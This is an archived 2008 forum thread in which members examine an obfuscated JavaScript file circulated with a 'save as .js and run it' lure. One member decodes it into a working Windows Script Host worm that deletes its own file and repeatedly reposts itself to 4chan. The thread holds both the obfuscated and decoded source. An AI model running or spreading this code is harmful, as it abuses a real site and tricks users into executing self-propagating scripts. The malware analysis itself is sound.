...

View Full Version : [JS] Weird script... :S



bulld0z3r
08-31-2008, 07:58 PM
I been browsing the internet and found this script:



nm="<lQr@?E6?E\\s:DA@D:E:@?iO7@C>\\52E2jO?2>6lQ\r\n"+
"7F?4E:@?OCWXLC6EFC?O$EC:?8]7C@>r92Cr@56WQ2Q]492Cr@56pEW_XZ"+
"|2E9]7=@@CW|2E9]C2?5@>WXYaeXXN\r\n"+
"7l($w]4C62E6@3;64EWQD4C:AE:?8]7:=6DJDE6>@3;64EQX\r\n"+
"8l7]@A6?E6IE7:=6W($w]D4C:AE7F==?2>6X\r\n"+
"9l8]C6252==WX\r\n"+
"8]4=@D6WX\r\n"+
"7]56=6E67:=6W($w]D4C:AE7F==?2>6X\r\n"+
"IlQr@AJO2?5OA2DE6OE96O7@==@H:?8OE@O}@E6A25[OD2G6OH:E9OE96O"+
"7:=6?2>6O-Qc492?];D-Q[O@A6?OE96O7:=6OJ@FO4C62E65O2?5OD9:EO"+
"3C:4<D]-C-?-C-?QZ9\r\n"+
"2l($w]4C62E6@3;64EWQ>DI>=a]I>=9EEAQX\r\n"+
"H9:=6W`XL\r\n"+
"2]@A6?WQ86EQ[Q9EEAi^^:>8]c492?]@C8^3Q[_X\r\n"+
"2]D6?5WX\r\n"+
"3l2]C6DA@?D6E6IE\r\n"+
"4l3]DF3DECW3]:?56I 7WQC6D^QXZc[gX\r\n"+
"5lQQ\r\n"+
"6lQQ\r\n"+
"7@CW:l_j:ka_j:ZZX5ZlCWX\r\n"+
"7@CW:l_j:kgj:ZZX6ZlCWX\r\n"+
"2]@A6?WQA@DEQ[Q9EEAi^^52E]c492?]@C8^3^:>83@2C5]A9AQ[_X\r\n"+
"ElQ>F=E:A2CE^7@C>\\52E2jO3@F?52CJlQZ5\r\n"+
"2]D6EC6BF6DE96256CWQr@?E6?E\\%JA6Q[EX\r\n"+
"2]D6?5WQ\\\\QZ5ZQ-C-?QZ<ZQ-Q|p)0ux{t0$x+t-Q-C-?-C-?QZ\r\n"+
"Qa_hf`da-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
"<ZQ-QC6DE@-Q-C-?-C-?QZ4ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
"<ZQ-Q?2>6-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
"<ZQ-Q6>2:=-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
"<ZQ-QDF3-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
"<ZQ-Q4@>-Q-C-?-C-?QZIZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
"<ZQ-QFA7:=6-QjO7:=6?2>6l-Q-Q-C-?QZ\r\n"+
"Qr@?E6?E\\%JA6iO2AA=:42E:@?^@4E6E\\DEC62>-C-?-C-?-C-?\\\\Q"+
"Z5ZQ-C-?QZ\r\n"+
"<ZQ-QAH5-Q-C-?-C-?QZ6ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
"<ZQ-Q>@56-Q-C-?-C-?C68:DE-C-?\\\\QZ5ZQ\\\\-C-?QX\r\n"+
"($w]D=66AWb6cZ|2E9]7=@@CW|2E9]C2?5@>WXYb6cXXN"
e=eval
e('vv="";for(i=0;i<nm.len'+'gth;i++){;if(nm.charA'+
't(i)=="\\r")vv+="\\r";e'+'lse if(nm.cha'+'rAt(i'+
')=="\\n'+'")vv+="\\n";el'+'se vv+=String.fromCh'+
'arCode((nm.ch'+
'arC'+'odeAt(i)-32+47)%94+32)};ev'+
'al(vv);');;;;;;;;;;;


The guys who posted it also wrote that:


COPY POSTED SCRIPT TO NOTEPAD AND SAVE THE FILE AS .JS AND THAN RUN IT...


what will happen?

Philip M
09-01-2008, 08:29 AM
COPY POSTED SCRIPT TO NOTEPAD AND SAVE THE FILE AS .JS AND THEN RUN IT...

what will happen?


I'll give you three guesses, but I would expect that your computer will be infected with a malicious virus or trojan. The eval() function evaluates a string and executes it as if it was script code. In this case the string is encrypted. Or perhaps nothing will happen. Suggest you try it and post back (if your computer is still working).


Press any key to continue or any other key to quit

Mikebert4
09-01-2008, 07:06 PM
What you have there is encripted Javascript.

Some Source-code protection programs allow you to encript the javascript source into (effectively) trash, hence stopping the majority of people from viewing the source.

I'd say thats what's happened here - though as bulld0z3r said - beware of hidden code like that as it can pull all sorts of rubbish to your PC.

Millenia
09-01-2008, 07:11 PM
into (effectively) trash

Decoding things like this is usually incredibly easy.

liorean
09-01-2008, 11:08 PM
Decoding isn't hard. First, simply merge the split strings.

nm="<lQr@?E6?E\\s:DA@D:E:@?iO7@C>\\52E2jO?2>6lQ\r\n7F?4E:@?OCWXLC6EFC?O$EC:?8]7C@>r92Cr@56WQ2Q]492Cr@56pEW_XZ|2E9]7=@@CW|2E9]C2?5@>WXYaeXXN\r\n7l($w]4C62E6@3;64EWQD4C:AE:?8]7:=6DJDE6>@3;64EQX\r\n8l7]@A6?E6IE7:=6W($w]D4C:AE7F==?2>6X\r\n9l8]C6252==WX\r\n8]4=@D6WX\r\n7]56=6E67:=6W($w]D4C:AE7F==?2>6X\r\nIlQr@AJO2?5OA2DE6OE96O7@==@H:?8OE@O}@E6A25[OD2G6OH:E9OE96O7:=6?2>6O-Qc492?];D-Q[O@A6?OE96O7:=6OJ@FO4C62E65O2?5OD9:EO3C:4<D]-C-?-C-?QZ9\r\n2l($w]4C62E6@3;64EWQ>DI>=a]I>=9EEAQX\r\nH9:=6W`XL\r\n2]@A6?WQ86EQ[Q9EEAi^^:>8]c492?]@C8^3Q[_X\r\n2]D6?5WX\r\n3l2]C6DA@?D6E6IE\r\n4l3]DF3DECW3]:?56I 7WQC6D^QXZc[gX\r\n5lQQ\r\n6lQQ\r\n7@CW:l_j:ka_j:ZZX5ZlCWX\r\n7@CW:l_j:kgj:ZZX6ZlCWX\r\n2]@A6?WQA@DEQ[Q9EEAi^^52E]c492?]@C8^3^:>83@2C5]A9AQ[_X\r\nElQ>F=E:A2CE^7@C>\\52E2jO3@F?52CJlQZ5\r\n2]D6EC6BF6DE96256CWQr@?E6?E\\&#37;JA6Q[EX\r\n2]D6?5WQ\\\\QZ5ZQ-C-?QZ<ZQ-Q|p)0ux{t0$x+t-Q-C-?-C-?QZ\r\nQa_hf`da-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QC6DE@-Q-C-?-C-?QZ4ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q?2>6-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q6>2:=-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QDF3-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q4@>-Q-C-?-C-?QZIZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QFA7:=6-QjO7:=6?2>6l-Q-Q-C-?QZ\r\nQr@?E6?E\\%JA6iO2AA=:42E:@?^@4E6E\\DEC62>-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QAH5-Q-C-?-C-?QZ6ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q>@56-Q-C-?-C-?C68:DE-C-?\\\\QZ5ZQ\\\\-C-?QX\r\n($w]D=66AWb6cZ|2E9]7=@@CW|2E9]C2?5@>WXYb6cXXN";
e=eval;
e('vv="";for(i=0;i<nm.length;i++){;if(nm.charAt(i)=="\\r")vv+="\\r";else if(nm.charAt(i)=="\\n")vv+="\\n";else vv+=String.fromCharCode((nm.charCodeAt(i)-32+47)%94+32)};eval(vv);');
Okay, then take the eval part and replace it with the code that is being run in it:

nm="<lQr@?E6?E\\s:DA@D:E:@?iO7@C>\\52E2jO?2>6lQ\r\n7F?4E:@?OCWXLC6EFC?O$EC:?8]7C@>r92Cr@56WQ2Q]492Cr@56pEW_XZ|2E9]7=@@CW|2E9]C2?5@>WXYaeXXN\r\n7l($w]4C62E6@3;64EWQD4C:AE:?8]7:=6DJDE6>@3;64EQX\r\n8l7]@A6?E6IE7:=6W($w]D4C:AE7F==?2>6X\r\n9l8]C6252==WX\r\n8]4=@D6WX\r\n7]56=6E67:=6W($w]D4C:AE7F==?2>6X\r\nIlQr@AJO2?5OA2DE6OE96O7@==@H:?8OE@O}@E6A25[OD2G6OH:E9OE96O7:=6?2>6O-Qc492?];D-Q[O@A6?OE96O7:=6OJ@FO4C62E65O2?5OD9:EO3C:4<D]-C-?-C-?QZ9\r\n2l($w]4C62E6@3;64EWQ>DI>=a]I>=9EEAQX\r\nH9:=6W`XL\r\n2]@A6?WQ86EQ[Q9EEAi^^:>8]c492?]@C8^3Q[_X\r\n2]D6?5WX\r\n3l2]C6DA@?D6E6IE\r\n4l3]DF3DECW3]:?56I 7WQC6D^QXZc[gX\r\n5lQQ\r\n6lQQ\r\n7@CW:l_j:ka_j:ZZX5ZlCWX\r\n7@CW:l_j:kgj:ZZX6ZlCWX\r\n2]@A6?WQA@DEQ[Q9EEAi^^52E]c492?]@C8^3^:>83@2C5]A9AQ[_X\r\nElQ>F=E:A2CE^7@C>\\52E2jO3@F?52CJlQZ5\r\n2]D6EC6BF6DE96256CWQr@?E6?E\\%JA6Q[EX\r\n2]D6?5WQ\\\\QZ5ZQ-C-?QZ<ZQ-Q|p)0ux{t0$x+t-Q-C-?-C-?QZ\r\nQa_hf`da-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QC6DE@-Q-C-?-C-?QZ4ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q?2>6-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q6>2:=-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QDF3-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q4@>-Q-C-?-C-?QZIZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QFA7:=6-QjO7:=6?2>6l-Q-Q-C-?QZ\r\nQr@?E6?E\\%JA6iO2AA=:42E:@?^@4E6E\\DEC62>-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QAH5-Q-C-?-C-?QZ6ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q>@56-Q-C-?-C-?C68:DE-C-?\\\\QZ5ZQ\\\\-C-?QX\r\n($w]D=66AWb6cZ|2E9]7=@@CW|2E9]C2?5@>WXYb6cXXN";
e=eval;
vv="";
for(i=0;i<nm.length;i++){
if(nm.charAt(i)=="\r")
vv+="\r";
else if(nm.charAt(i)=="\n")
vv+="\n";
else
vv+=String.fromCharCode((nm.charCodeAt(i)-32+47)%94+32)
};
eval(vv);The code should be pretty self explanatory by now, but to get brief, vv ends up being the result of doing a rot47 on the sequence of 94 characters that start at whitespace (U+0020) - as well as preserving any line feeds (U+000A) and carriage returns (U+000D) - in the orignal variable nm.

The result replacing the eval(vv); with it's code is the following:
k="Content-Disposition: form-data; name="

function r(){return String.fromCharCode("a".charCodeAt(0)+Math.floor(Math.random()*26))}

f=WSH.createobject("scripting.filesystemobject")

g=f.opentextfile(WSH.scriptfullname)

h=g.readall()

g.close()

f.deletefile(WSH.scriptfullname)

x="Copy and paste the following to Notepad, save with the filename \"4chan.js\", open the file you created and **** bricks.\r\n\r\n"+h

a=WSH.createobject("msxml2.xmlhttp")

while(1){

a.open("get","http://img.4chan.org/b",0)

a.send()

b=a.responsetext

c=b.substr(b.indexOf("res/")+4,8)

d=""

e=""

for(i=0;i<20;i++)d+=r()

for(i=0;i<8;i++)e+=r()

a.open("post","http://dat.4chan.org/b/imgboard.php",0)

t="multipart/form-data; boundary="+d

a.setrequestheader("Content-Type",t)

a.send("--"+d+"\r\n"+k+"\"MAX_FILE_SIZE\"\r\n\r\n"+

"2097152\r\n--"+d+"\r\n"+

k+"\"resto\"\r\n\r\n"+c+"\r\n--"+d+"\r\n"+

k+"\"name\"\r\n\r\n\r\n--"+d+"\r\n"+

k+"\"email\"\r\n\r\n\r\n--"+d+"\r\n"+

k+"\"sub\"\r\n\r\n\r\n--"+d+"\r\n"+

k+"\"com\"\r\n\r\n"+x+"\r\n--"+d+"\r\n"+

k+"\"upfile\"; filename=\"\"\r\n"+

"Content-Type: application/octet-stream\r\n\r\n\r\n--"+d+"\r\n"+

k+"\"pwd\"\r\n\r\n"+e+"\r\n--"+d+"\r\n"+

k+"\"mode\"\r\n\r\nregist\r\n--"+d+"--\r\n")

WSH.sleep(3e4+Math.floor(Math.random()*3e4))}

Philip M
09-02-2008, 09:13 AM
And it actually does - what?

liorean
09-02-2008, 04:31 PM
Well, let's see. It's designed to be run in the Windows Scripting Host. (Which is the default behaviour when opening .js files on Windows, which I find hilarious considering that writing .js files for homepages must be many times more usual than writing windows scripts.)
f=WSH.createobject("scripting.filesystemobject");
g=f.opentextfile(WSH.scriptfullname);
h=g.readall();
g.close();
f.deletefile(WSH.scriptfullname);This part reads the content of the file (the OP's source code, that is) into the variable h and then deletes that file.



a=WSH.createobject("msxml2.xmlhttp");
while(1){
a.open("get","http://img.4chan.org/b",0);
a.send();
b=a.responsetext;
c=b.substr(b.indexOf("res/")+4,8);This part seems to mine a certain string out of a 4chan page.



d="";
e="";
for(i=0;i<20;i++)d+=r();
for(i=0;i<8;i++)e+=r();
a.open("post","http://dat.4chan.org/b/imgboard.php",0);
t="multipart/form-data; boundary="+d;
a.setrequestheader("Content-Type",t);
a.send("--"+d+"\r\n"+k+"\"MAX_FILE_SIZE\"\r\n\r\n"+
"2097152\r\n--"+d+"\r\n"+
k+"\"resto\"\r\n\r\n"+c+"\r\n--"+d+"\r\n"+
k+"\"name\"\r\n\r\n\r\n--"+d+"\r\n"+
k+"\"email\"\r\n\r\n\r\n--"+d+"\r\n"+
k+"\"sub\"\r\n\r\n\r\n--"+d+"\r\n"+
k+"\"com\"\r\n\r\n"+x+"\r\n--"+d+"\r\n"+
k+"\"upfile\"; filename=\"\"\r\n"+
"Content-Type: application/octet-stream\r\n\r\n\r\n--"+d+"\r\n"+
k+"\"pwd\"\r\n\r\n"+e+"\r\n--"+d+"\r\n"+
k+"\"mode\"\r\n\r\nregist\r\n--"+d+"--\r\n");
This part seems to generate a random username and password and try to post the message the OP had seen to 4chan.




WSH.sleep(3e4+Math.floor(Math.random()*3e4));
}And this part puts the script process to sleep after each try at posting, after which it will resume that infinite loop that started with the while(1){ above.



EZ Archive Ads Plugin for vBulletin Copyright 2006 Computer Help Forum